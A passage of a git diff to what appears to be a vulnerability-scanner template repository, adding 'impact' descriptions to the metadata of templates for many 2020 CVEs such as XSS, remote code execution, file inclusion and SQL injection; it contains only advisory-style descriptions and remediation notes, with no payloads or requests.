@@ -6,6 +6,8 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 0a552be458..695f0c3204 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 5bad9c5f0a..78c4dd5414 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: high description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion. reference: diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 9cc5093afb..98f10a0a17 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. + impact: | + An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera. remediation: | Update the camera firmware to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index e7fed98189..96dcaa50b9 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -7,6 +7,8 @@ info: author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 8323f0fe08..40d55d0ebe 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system. remediation: | Apply the latest security patches provided by Sophos to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 28fd68342d..288df8d6ae 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts or steal sensitive information from users. remediation: | Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 7d40250e23..eb9df2b52a 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 5ad3b16b17..2f7a7a0593 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 56dc9b6062..21427c6031 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: high description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index dc4ee3cc0b..766223c83d 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. remediation: | Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 54a3bd603f..970c86ab5c 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application. remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. reference: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index d780b4f80d..e4a6000b99 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the affected system. remediation: | Apply the latest security patches provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 6d435503d9..68837e9f71 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 305ccadb0c..2d280b0640 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -5,6 +5,8 @@ info: author: CasperGN,daffainfo severity: critical description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to Alerta. remediation: | Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 671cbbad19..cae2bf3bd0 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 13d1f4a1dc..4af7c1aeaa 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5766b58c63..65c047e982 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks. remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 5534237a40..702ec84c0e 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_,pikpikcu severity: medium description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade Gitlab CE/EE to version 13.6.3 or later. reference: diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 4218a0950b..d865cd6679 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + impact: | + An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin. remediation: | Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 4f3b5dedfe..b906b3a779 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 3e578ed1f5..35a19e7d6c 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. + impact: | + An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems. remediation: | Apply the latest security patches or upgrade to a patched version of Emby Server. reference: diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index dbd1cbd74d..58bb2850b8 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index f618a76212..3f8e4c1926 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index f430029a07..159732b9a4 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 8ba6a6a615..4a56960de0 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index f540af8a61..2935041113 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 1d2608f5e5..467b7a6c34 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 19945a3ecb..08cfe95452 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: high description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks. remediation: | Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 2fad5d25bc..572bbc4b57 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail. reference: diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 691ed5020c..f917259c4b 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml 
@@ -7,6 +7,8 @@ info: description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information. remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index ad4224d2a8..61114a378b 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + impact: | + An attacker can enumerate valid usernames, potentially aiding in further attacks. remediation: | Upgrade TerraMaster TOS to version 4.2.06 or later. reference: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 951c27fab6..af736d5548 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Apply the latest security patch or update provided by TerraMaster to fix the vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 6ca985d591..78e0d0304f 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system. remediation: | Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208). reference: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index abdd5d1088..720e7c53ce 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 67d8e84484..b565cd098e 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system. remediation: | Upgrade to a patched version of Monitorr or apply the necessary security patches. reference: diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 266da7d2ec..298a70090a 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage. remediation: | Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 532de6ce7c..b88fa68df5 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 43a0012c99..09f2340bfb 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5b0002d0a8..153b1b5891 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 1ceb572bfa..9bce8e3754 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index d1004e1132..58b79368a1 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + impact: | + An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 593ec5ec0a..2051651eb4 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network. remediation: | Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index e5c059ff37..e24f77f4f1 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution. remediation: | Apply the latest security patch or update to a version that addresses the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index a98064e04a..487dacee51 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -5,6 +5,8 @@ info: author: KareemSe1im severity: critical description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the affected system, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index d4ee715e7e..b4d0decb77 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml 
